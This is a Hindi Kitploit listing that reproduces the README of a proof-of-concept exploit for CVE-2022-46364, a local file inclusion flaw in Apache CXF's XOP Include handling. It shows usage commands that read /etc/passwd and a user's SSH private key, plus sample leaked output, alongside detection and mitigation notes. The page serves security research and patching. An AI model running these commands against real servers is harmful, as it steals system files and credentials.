Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-46364---Apache-CXF-XOP-Include-LFI-PoC — CVE-2022-46364 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Apache CXF में SOAP अनुरोधों में निर्मित XOP Include तत्वों के माध्यम से एक स्थानीय फ़ाइल समावेशन भेद्यता, जो मनमानी फ़ाइल पढ़ने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/shashivanth009/cve-2022-46364---apache-cxf-xop-include-lfi-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshashivanth009/cve-2022-46364---apache-cxf-xop-include-lfi-poc

CVE-2022-46364---Apache-CXF-XOP-Include-LFI-PoC

CVE-2022-46364 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Apache CXF में SOAP अनुरोधों में निर्मित XOP Include तत्वों के माध्यम से एक स्थानीय फ़ाइल समावेशन भेद्यता, जो मनमानी फ़ाइल पढ़ने की अनुमति देती है।

रिपॉजिटरी देखें
125 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache CXF XOP Include LFI (CVE-2022-46364)

अवलोकन

इस रिपॉजिटरी में CVE-2022-46364 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो Apache CXF में एक लोकल फ़ाइल इन्क्लूज़न (LFI) कमज़ोरी है।

यह कमज़ोरी SOAP अनुरोधों में XOP (XML-binary Optimized Packaging) Include तत्वों के अनुचित हैंडलिंग के कारण उत्पन्न होती है, जिससे हमलावर सर्वर से मनमानी फ़ाइलें पढ़ सकते हैं।


कमज़ोरी विवरण

  • CVE ID: CVE-2022-46364
  • घटक: Apache CXF
  • कमज़ोरी प्रकार: लोकल फ़ाइल इन्क्लूज़न (LFI)
  • हमला वेक्टर: रिमोट (कुछ मामलों में बिना प्रमाणीकरण के)
  • प्रभाव: सर्वर पर मनमानी फ़ाइल पढ़ना

मूल कारण

Apache CXF SOAP अनुरोधों के अंदर <xop:Include> तत्वों को अनुचित तरीके से प्रोसेस करता है। एक गढ़ा हुआ href (जैसे, file:///etc/passwd) प्रदान करके, सर्वर स्थानीय फ़ाइल सामग्री को शामिल कर सकता है और वापस कर सकता है।


प्रभावित संस्करण

  • Apache CXF संस्करण पैच किए गए रिलीज़ से पहले (शाखा के अनुसार 3.4.x / 3.5.x)

अपने लक्ष्य वातावरण में हमेशा सटीक कमज़ोर संस्करण सत्यापित करें।


एक्सप्लॉइटेशन फ्लो

  1. हमलावर एक गढ़ा हुआ SOAP अनुरोध भेजता है
  2. इसमें <xop:Include href="file:///path/to/file"> शामिल करता है
  3. सर्वर अनुरोध को प्रोसेस करता है और स्थानीय फ़ाइल पढ़ता है
  4. फ़ाइल सामग्री SOAP प्रतिक्रिया के अंदर वापस आती है

रिपॉजिटरी संरचना

root@kitploit:~
.
├── cxf_lfi.sh       # एक्सप्लॉइट स्क्रिप्ट
├── README.md        # दस्तावेज़ीकरण
├── LICENSE          # MIT लाइसेंस
└── .gitignore

आवश्यकताएँ

  • Bash
  • curl
  • base64 (वैकल्पिक, आउटपुट को डिकोड करने के लिए)

उपयोग

1. स्क्रिप्ट को निष्पादन योग्य बनाएँ

root@kitploit:~
chmod +x cxf_lfi.sh

2. लक्ष्य URL संपादित करें

स्क्रिप्ट के अंदर लक्ष्य को अपडेट करें:

root@kitploit:~
TARGET="http://<TARGET_IP>:8080/employeeservice"

3. एक्सप्लॉइट चलाएँ

root@kitploit:~
./cxf_lfi.sh file:///etc/passwd

उदाहरण हमले

उदाहरण 1: सिस्टम उपयोगकर्ताओं को पढ़ें

root@kitploit:~
./cxf_lfi.sh file:///etc/passwd

उदाहरण 2: एप्लिकेशन रहस्य पढ़ें

root@kitploit:~
./cxf_lfi.sh file:///home/user/.ssh/id_rsa

नमूना आउटपुट

root@kitploit:~
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

नोट्स और सीमाएँ

  • कुछ सर्वर:

    • base64-एन्कोडेड सामग्री लौटा सकते हैं
    • अनुमतियों के माध्यम से फ़ाइल एक्सेस को प्रतिबंधित कर सकते हैं
    • file:// स्कीमों को सैनिटाइज़ या ब्लॉक कर सकते हैं
  • आउटपुट पार्सिंग प्रतिक्रिया प्रारूप पर निर्भर करता है और मैन्युअल निरीक्षण की आवश्यकता हो सकती है।


पहचान और शमन

पहचान

  • असामान्य SOAP अनुरोधों की निगरानी करें जिनमें शामिल हैं:

    • <xop:Include>
    • file:// URIs

शमन

  • Apache CXF को पैच किए गए संस्करण में अपग्रेड करें
  • यदि आवश्यक न हो तो XOP प्रोसेसिंग को अक्षम या प्रतिबंधित करें
  • आने वाले SOAP पेलोड को मान्य और सैनिटाइज़ करें

नैतिक उपयोग अस्वीकरण

यह प्रोजेक्ट इसके लिए है:

  • शैक्षिक उद्देश्य
  • अधिकृत पेनिट्रेशन टेस्टिंग

बिना स्पष्ट अनुमति के इस टूल का उपयोग सिस्टम पर न करें।


संदर्भ

  • Apache CXF सुरक्षा सलाहकार
  • CVE डेटाबेस (CVE-2022-46364)

लेखक

सुरक्षा अनुसंधान और CTF अभ्यास के भाग के रूप में विकसित किया गया।

टूल डाउनलोड करें